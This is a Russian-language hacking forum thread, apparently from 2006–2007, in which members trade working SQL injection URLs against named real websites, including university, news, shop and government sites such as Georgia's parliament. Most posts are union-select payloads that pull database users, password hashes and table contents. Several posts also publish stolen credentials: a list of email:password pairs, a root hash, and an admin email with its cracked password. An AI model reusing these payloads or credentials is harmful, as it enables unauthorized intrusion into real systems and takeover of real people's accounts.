SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Code:
    http://www.chayka.org/article.php?id=4630%20union%20select%201,table_name,3,4,5,6,7,8,9,0,1%20from+INFORMATION_SCHEMA.TABLES limit+0,1/*
    Code:
    CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, Articles, ArticlesAuthors, Authors, Issues, Old_Articles, Old_ArticlesAuthors, Old_Issues, ibf_admin_logs, ibf_admin_sessions, ibf_attachments, ibf_badwords, ibf_calendar_events, ibf_categories
     
    1 person likes this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вот некоторые аккаунты:
    формат:
    email: password

    danny.allison@bioenergy.abengoa.com:chancesr
    tallsop@newenergycorp.com:51673
    lisa_royal@admworld.com:lisa
    nantoniades@lallemand.com:lalleman
    denco@dencollc.com:willb

    и т.д. просто надоело...
     
  3. Cond

    Cond Member

    Joined:
    28 May 2007
    Messages:
    13
    Likes Received:
    6
    Reputations:
    1
    curious.astro.cornell.edu
    Code:
    http://curious.astro.cornell.edu/question.php?number=-1+union+select+concat(user,char(58),password),2,concat(version(),0x3a,user()%20,0x3a,database()),4,5,6+from+mysql.user/*
     
  4. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    www.legionhardware.com
    pass 1243
    login Steve

    Code:
    http://www.legionhardware.com/document.php?id=4630%20union%20select%201,2,3,4,5,6,7,8,email,10,11,password,13,14,15,16,17,18,19,20,21,name,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77%20from%20users/*
     
    1 person likes this.
  5. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.consodurable.org

    Code:
    http://www.consodurable.org/dossiers_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
     
  6. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.ethology.ru/news/?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8/*
     
  7. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    799
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://bip.kielce.rio.gov.pl/index.php?go=22&id_k=-93+union+select+1,2,3,concat(version(),char(58),user(),char(58),database())/*
    Кому несложно соберите все проделанные иньекции с 214 страницы по эту. Спасибо
     
    1 person likes this.
  8. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    ...
    Code:
    http://rus.militaryantiqueshop.com/view.php?id=-548+union+select+version(),2,3,user(),5,6,7,8,9/
    
    *
    http://teplo.lakkk.com/shop.view.php?product_id=-975+union+select+1,2,version(),user(),5,6,7,8,9
    
    ,10,11,12,13,14,15,16/*
    
     
  9. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Ща времени нет.. Убегаю)
     
    1 person likes this.
  10. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    ...
    Code:
    http://www.articolo21.info/news.php?id=-20116+union+select+1,2,3,4,5/*
    http://www.suederelbe.info/content.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    
     
    1 person likes this.
  11. Cond

    Cond Member

    Joined:
    28 May 2007
    Messages:
    13
    Likes Received:
    6
    Reputations:
    1
    journalism.berkeley.edu
    Code:
    http://journalism.berkeley.edu/events/details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,database(),26,user(),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
     
    1 person likes this.
  12. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Code:
    http://www.a1tv.ru/AOpenBands.php?Band=-57+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5/*
     
    #2352 NOmeR1, 30 May 2007
    Last edited by a moderator: 30 May 2007
  13. stagediver

    stagediver New Member

    Joined:
    2 May 2007
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    подбираем имена таблиц, осуществляем последовательный вывод записей и преодолеваем экранирование кавычек в ORACLE:

    Code:
    http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=-1+union+select+1,null,null,null,table_name||chr(58)||column_name||chr(58)||data_type+from+(select+a.*,rownum+rnum+from+(select+*+from+user_tab_columns+where+table_name=chr(76)||chr(79)||chr(71)||chr(73)||chr(78)||chr(83)+order+by+column_name)+a+where+rownum+%3C=+1)+where+rnum+%3E=+1--
     
    2 people like this.
  14. rObad

    rObad Member

    Joined:
    12 Apr 2007
    Messages:
    10
    Likes Received:
    9
    Reputations:
    0
    наши маленькие друзья

    Парламент Грузии
    Code:
    http://www.parliament.ge/index.php?lang_id=ENG&sec_id=36&info_id=-16000+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x71),0x71),6,7,8,9,10,11,12,13+from+mysql.user/*
    root:6b8c7ae75e3ec972
    мускул 4 ветки
     
  15. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    вот и от меня, только не могу подобрать колонку с паролем
    Code:
    http://www.hakiminternational.com/cpCommerce/category.php?id_category=-1+union+select+1,email,3,4+from+cpAccounts+where+level=3/*

    зы подобрал колонка pass

    хэш - 5e8e3302732abbc67998f8ccd0362dad

    ззы пароль- hakim1
    email - info@hakiminternational.com
     
    #2355 geezer.code, 30 May 2007
    Last edited: 30 May 2007
  16. Boccob

    Boccob Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    37
    Likes Received:
    18
    Reputations:
    1
    psyplanet.ru
    Отпишитесь в ПМ, если кто-нибудь сможет раскрутить хоть одну из них.
     
    #2356 Boccob, 30 May 2007
    Last edited: 30 May 2007
  17. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Для начала

    Code:
    http://psyplanet.ru/profil.php?id=-6+UNION+SELECT+1,2,3,name,5,6,7+from+profile+where+id=31/*
    Дальше перебор по id ;)
    Есть еще таблица user.
     
    #2357 [53x]Shadow, 30 May 2007
    Last edited: 30 May 2007
    4 people like this.
  18. Серенький

    Joined:
    13 Apr 2007
    Messages:
    113
    Likes Received:
    145
    Reputations:
    83
    psyplanet.ru

    ничего, что не в личку?
    есть таблица user (user_name,user_pass)

    с админскими записями, админка тут:
     
    5 people like this.
  19. 0rt

    0rt New Member

    Joined:
    1 Feb 2007
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    http:// db.peacelink.org/campagne/info.php?id=-1+union+select+1,2,3,4,5,6/* index.php?id=67 +union+select+1,concat(user(),char(58),version()),3,4,5,6,7/*
    http://www .htmlbook.ru/content/?id=97+union +select+1,2,concat(user (),char(58),version())/*

    http://www.pcbsd.org/index.php?id=67+u nion+select+1,concat(user(),char(58),version()),3,4,5,6,7/*

    http://www.i d.isu.ru/news/index.php?id=4 1+union+select+1,2,3,4,5,column_ name+from+information_schema.columns+where+table_name='phpbb_users'/*

    http://www.ad ilsoz.kz/site.php?lan=russian&id=539&pub=-1+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13 /*
     
    1 person likes this.
  20. fYt

    fYt Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    54
    Likes Received:
    36
    Reputations:
    7
    http://www.cleanedge.com/views.php?id=428900000+union+select+1,2,3,4,5,6,concat(USER(),char(59),DATABASE(),char(59),VERSION()),8,9,10,11,12/*

    http://www.moresca.com/views.php?id=222222222+union+select+1,2,3,4,5,6,7,8,concat(USER(),char(59),DATABASE(),char(59),VERSION()),10,concat(username,char(59),password),12,13,14,15,16,17+from+users/*

    http://dinchen.jtagice.com/views.php?id=0000000065777+union+select+1,2,3,4,concat(user,char(59),password),6,7,8,9,10,11,concat(USER(),char(59),VERSION(),char(59),DATABASE()),13+from+mysql.user/*

    http://www.procasapanama.com/views.php?id=31111111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

    http://crca.ucsd.edu/views.php?id=222222+union+select+1,2,concat(user,char(58),password)+from+mysql.user/*
     
Loading...
Thread Status:
Not open for further replies.